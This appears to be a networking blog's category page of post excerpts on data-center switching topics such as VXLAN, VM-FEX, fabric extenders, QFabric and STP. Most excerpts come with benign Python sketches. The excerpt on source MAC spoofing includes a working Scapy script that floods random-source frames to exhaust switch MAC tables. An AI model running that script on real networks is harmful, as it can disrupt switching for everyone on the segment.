Category: switching
VXLAN, OTV and LISP
Immediately after VXLAN was announced at VMworld, the twittersphere erupted in speculation and questions, many of them focusing on how VXLAN relates to OTV and LISP, and why we might need a new encapsulation method.
VXLAN, OTV and LISP are point solutions targeting different markets. VXLAN is an IaaS infrastructure solution, OTV is an enterprise L2 DCI solution and LISP is ... whatever you want it to be.
VXLAN: MAC-over-IP-based vCloud networking
In one of my vCloud Director Networking Infrastructure rants I wrote “if they had decided to use IP encapsulation, I would have applauded.” It’s time to applaud: Cisco has just demonstrated Nexus 1000V supporting MAC-over-IP encapsulation for vCloud Director isolated networks at VMworld, solving at least some of the scalability problems MAC-in-MAC encapsulation has.
Once the new release becomes available, the Nexus 1000V VEM will be able to encapsulate MAC frames generated by virtual machines residing in isolated segments into UDP packets exchanged between VEMs.
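To make the encapsulation idea more tangible, here's a minimal Python sketch of MAC-over-UDP (VXLAN-style) encapsulation following the header layout in the VXLAN draft (later RFC 7348); the VNI, addresses and source-port hash are illustrative assumptions, not the Nexus 1000V implementation:

```python
# Minimal sketch of VXLAN-style MAC-over-UDP encapsulation, following the
# header layout from the VXLAN draft (later RFC 7348). The VNI, addresses and
# source-port hash below are illustrative assumptions; this is NOT the
# Nexus 1000V implementation, just the encapsulation idea.
import socket
import struct
import zlib

VXLAN_UDP_PORT = 4789   # IANA-assigned destination port (early implementations varied)

def vxlan_encapsulate(inner_frame: bytes, vni: int) -> bytes:
    """Prepend the 8-byte VXLAN header to an inner Ethernet frame."""
    flags = 0x08 << 24                               # I bit set: VNI field is valid
    header = struct.pack("!II", flags, vni << 8)     # 24-bit VNI, lowest byte reserved
    return header + inner_frame

def send_to_remote_vem(inner_frame: bytes, vni: int, remote_vtep_ip: str) -> None:
    """Ship the encapsulated frame to the remote VTEP (VEM) over UDP."""
    payload = vxlan_encapsulate(inner_frame, vni)
    # Deriving the UDP source port from a hash of the inner MAC header gives
    # the IP underlay per-flow entropy for ECMP load balancing.
    src_port = 49152 + (zlib.crc32(inner_frame[:12]) & 0x3FFF)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind(("", src_port))
        sock.sendto(payload, (remote_vtep_ip, VXLAN_UDP_PORT))
```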
Soft Switching Might not Scale, but We Need It
Following a series of soft switching articles written by Nicira engineers (hint: they’re using an approach similar to the one taken by Juniper’s QFabric marketing team), Greg Ferro wrote a scathing Soft Switching Fails at Scale reply.
While I agree with many of his arguments, the sad truth is that with the current state of server infrastructure virtualization we need soft switching regardless of the hardware vendors’ claims about the benefits of 802.1Qbg (EVB/VEPA), 802.1Qbh (port extenders) or VM-FEX.
Quotes of the week
I’ve spent the last few days with a fantastic group of highly skilled networking engineers (can’t share the details, but you know who you are) discussing the topics I like most: BGP, MPLS, MPLS Traffic Engineering and IPv6 in Service Provider environments.
One of the problems we were trying to solve was a clean split of a POP into two sites, retaining redundancy without adding too much extra equipment. The drive for maximum redundancy nudged me to propose the unimaginable: a layer-2 interconnect between four tightly controlled routers running BGP, but even that got shot down with a memorable quote from the senior network architect.
VM-FEX – not as convoluted as it looks
Reading Cisco’s marketing materials, VM-FEX (the feature previously known as VN-Link before someone went on a FEX-branding spree) seems like a fantastic idea: VMs running in an ESX host are connected directly to virtual physical NICs offered by the Palo adapter and then through point-to-point virtual links to the upstream switch, where you can deploy all sorts of features the virtual switch embedded in the ESX host still cannot offer. As you might imagine, the reality behind the scenes is more complex.
Source MAC address spoofing DoS attack
Flooding attacks (or mishaps) on large layer-2 networks are well known, and there are ample means to protect the network against them, for example the storm control feature available on Cisco switches. Now imagine you change the source MAC address of every packet sent to a perfectly valid unicast destination.
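To illustrate the point (strictly in a lab you own), here's what such a frame stream could look like in a short Scapy sketch; the interface name, destination MAC and IP addresses are placeholders:

```python
# Lab-only illustration of the attack sketched above: every frame carries a
# random source MAC, so each one consumes a fresh MAC-table entry on every
# switch in the path even though the destination is a valid unicast address.
# Interface name, destination MAC and IP addresses are made-up placeholders;
# never run this against equipment you don't own.
from scapy.all import Ether, IP, UDP, RandMAC, sendp   # requires scapy

def mac_table_exhaustion_demo(iface: str = "eth0", count: int = 1000) -> None:
    frames = [
        Ether(src=RandMAC(), dst="00:11:22:33:44:55") /
        IP(src="192.0.2.1", dst="192.0.2.2") / UDP(dport=53)
        for _ in range(count)
    ]
    sendp(frames, iface=iface, verbose=False)
```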
Stop reinventing the wheel and look around
Building large-scale VLANs to support IaaS services is every data center designer’s nightmare and the low number of VLANs supported by some data center gear is not helping anyone. However, as Anonymous Coward pointed out in a comment to my Building a Greenfield Data Center post, service providers have been building very large (and somewhat stable) layer-2 transport networks for years. It does seem like someone is trying to reinvent the wheel (and/or sell us more gear).
VLANs used by Nexus 1000V
Chris sent me an interesting question:
Imagine L2 traffic between two VMs on different ESX hosts, both using the Nexus 1000V. Will the physical switches see the traffic with source and destination MACs matching the VMs’ vNICs, or traffic on the Nexus 1000V “packet” VLAN between VEMs (in which case the packet VLAN would act as a virtual backplane)?
Building a Greenfield Data Center
The following design challenge landed in my Inbox not too long ago:
My organization is in the process of building a completely new data center from the ground up (new hardware, software, protocols ...). We will start with one site but may move to two for DR purposes. What DC technologies should we be looking at implementing to build a stable infrastructure that will scale and support technologies you feel will play a big role in the future?
In an ideal world, my answer would begin with “Start with the applications.”
Do we need distributed switching on Nexus 2000?
Yandy sent me an interesting question:
Is it just me or do you also see the Nexus 2000 series not having any type of distributed forwarding as a major design flaw? Cisco keeps throwing in the “it's a line-card” line, but any dumb modular switch nowadays has distributed forwarding in all its line cards.
I’m at least as annoyed as Yandy is by the lack of distributed switching in the Nexus port (oops, fabric) extender product range, but let’s focus on a different question: does it matter?
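To make the question concrete, here's a toy Python model of what the lack of local switching means; the port names and topology are invented for illustration:

```python
# Toy model of port-extender forwarding with no local switching: the fabric
# extender never looks up the destination MAC, so a frame between two servers
# on the same Nexus 2000 still hairpins through the parent switch and crosses
# the fabric uplink twice. Port names and topology are invented for illustration.
def fex_forward(ingress_port: str, egress_port: str) -> list:
    """Path a unicast frame takes through a FEX that has no distributed forwarding."""
    return [ingress_port, "fex-uplink", "parent-switch", "fex-uplink", egress_port]

# Two servers on ports of the same FEX:
print(fex_forward("fex100/eth1/1", "fex100/eth1/2"))
# ['fex100/eth1/1', 'fex-uplink', 'parent-switch', 'fex-uplink', 'fex100/eth1/2']
```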
Hypervisors use promiscuous NIC mode – does it matter?
Chris Marget sent me the following interesting observation:
One of the things we learned back at the beginning of Ethernet is no longer true: hardware filtering of incoming Ethernet frames by the NICs in Ethernet hosts is gone. VMware runs its NICs in promiscuous mode. The fact that this Networking 101 level detail is no longer true kind of blows my mind.
So what exactly is going on and does it matter?
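To see what Chris is describing on a plain Linux box, here's a quick, Linux-only sketch (the interface name is just an example) that checks whether a NIC has the promiscuous flag set:

```python
# Linux-only sketch that checks whether a NIC runs in promiscuous mode by
# reading the interface flags exported through sysfs. IFF_PROMISC (0x100) is
# the standard Linux flag; the interface name is just an example.
IFF_PROMISC = 0x100

def is_promiscuous(ifname: str = "eth0") -> bool:
    with open(f"/sys/class/net/{ifname}/flags") as f:
        flags = int(f.read().strip(), 16)   # flags are exported as a hex string
    return bool(flags & IFF_PROMISC)

if __name__ == "__main__":
    print("eth0 promiscuous:", is_promiscuous("eth0"))
```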
Automatic edge VLAN provisioning with VM Tracer from Arista
One of the implications of Virtual Machine (VM) mobility (as implemented by VMware’s vMotion or Microsoft’s Live Migration) is the need to have the same VLAN configured on the access ports connected to the source and the target hypervisor hosts. EVB (802.1Qbg) provides a perfect solution, but it’s questionable when it will leave the dreamland domain. In the meantime, most environments have to deploy stretched VLANs ... or you might be able to use hypervisor-aware features of your edge switches, for example VM Tracer implemented in Arista EOS.
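As a conceptual illustration only, here's a short Python sketch of the provisioning logic such a feature automates; the dictionaries stand in for information the switch could pull from vCenter, and nothing here is Arista's actual API:

```python
# Conceptual sketch only: the dictionaries stand in for information an edge
# switch could pull from vCenter (which host hangs off which port, which VMs
# run on that host, which VLAN each VM's port group uses). This is not
# Arista's API, just the provisioning logic VM Tracer automates.
from typing import Dict, List, Set

def vlans_needed_per_port(
    port_to_host: Dict[str, str],        # edge port -> attached hypervisor host
    host_to_vms: Dict[str, List[str]],   # host -> VMs currently running on it
    vm_to_vlan: Dict[str, int],          # VM -> VLAN of its port group
) -> Dict[str, Set[int]]:
    """Compute the minimal VLAN set to trunk on each hypervisor-facing port."""
    return {
        port: {vm_to_vlan[vm] for vm in host_to_vms.get(host, [])}
        for port, host in port_to_host.items()
    }

# After a vMotion moves web-01 from esx1 to esx2, rerunning this prunes
# VLAN 100 from Ethernet1 and adds it to Ethernet2:
print(vlans_needed_per_port(
    {"Ethernet1": "esx1", "Ethernet2": "esx2"},
    {"esx1": ["db-01"], "esx2": ["web-01"]},
    {"web-01": 100, "db-01": 200},
))   # {'Ethernet1': {200}, 'Ethernet2': {100}}
```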
VN-Tag/802.1Qbh basics
A few years ago Cisco introduced an interesting concept to data center networking: fabric extenders, devices acting like remote linecards of a central switch (Juniper’s “revolutionary” QFabric looks very similar from a distance; the only major difference seems to be local switching in the QF/Nodes). Cisco’s proprietary technology used in its FEX products became the basis for 802.1Qbh, an IEEE draft that is supposed to standardize the port extender architecture.
If you’re not familiar with the FEX products, read my “Port or Fabric Extenders?” article before continuing ... and disregard most of what it says about 802.1Qbh.
Speculation: This is how I would build QFabric
Three months after the QFabric launch, the details remain shrouded in mystical clouds, so let’s try to speculate what they could be hiding. We have two well-known facts:
- QFabric has three components: QF/Node (edge device), QF/Interconnect (high-speed core device) and QF/Director (the brains).
- Juniper is strong in the Service Provider technologies, including MPLS, MPLS/VPN, VPLS and BGP. It’s also touting its BGP MPLS-based MAC VPN technology (too long to write more than once, let’s call it BMMV).
I am positive Juniper would never try to build a monster single-brain fabric with a Borg or Big Brother architecture, as such designs simply don’t scale (as the OpenFlow crowd will learn in a few years).
Ignoring STP? Be careful, be very careful
A while ago I described what it takes to integrate a TRILL backbone with legacy equipment running Spanning Tree Protocol (STP). Unfortunately, Brocade decided to use a non-standard approach to BPDU handling when implementing their TRILL-like VCS fabric. VDX switches running in fabric mode can either drop incoming BPDU frames or transport them transparently across the fabric to other edge ports. Although VDX switches support STP, RSTP and MSTP (as well as RootGuard and BPDUGuard) when configured as standalone switches, STP processing is disabled when you configure fabric mode; the VCS fabric looks like a huge shared LAN segment to the end hosts and core switches.
2013-03-31: Network OS 4.0 and above supports Distributed Spanning Tree (DiST); for more details, read this blog post.
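Out of curiosity, here's a toy sketch of the two pre-DiST behaviors described above (drop the BPDUs or tunnel them transparently between edge ports); the policy knob and return values are hypothetical:

```python
# Toy illustration of the two pre-DiST behaviors described above: a fabric-mode
# edge port either drops incoming BPDUs or tunnels them transparently to the
# other edge ports. The policy knob and return values are hypothetical; only
# the BPDU destination MAC (01:80:C2:00:00:00) is the real 802.1D constant.
STP_BPDU_DMAC = bytes.fromhex("0180c2000000")

def handle_edge_frame(frame: bytes, bpdu_policy: str = "drop"):
    """Classify a frame arriving on a fabric-mode edge port."""
    if frame[:6] == STP_BPDU_DMAC:
        return "tunnel-to-edge-ports" if bpdu_policy == "tunnel" else "drop"
    return "bridge-normally"   # regular traffic is switched by the fabric
```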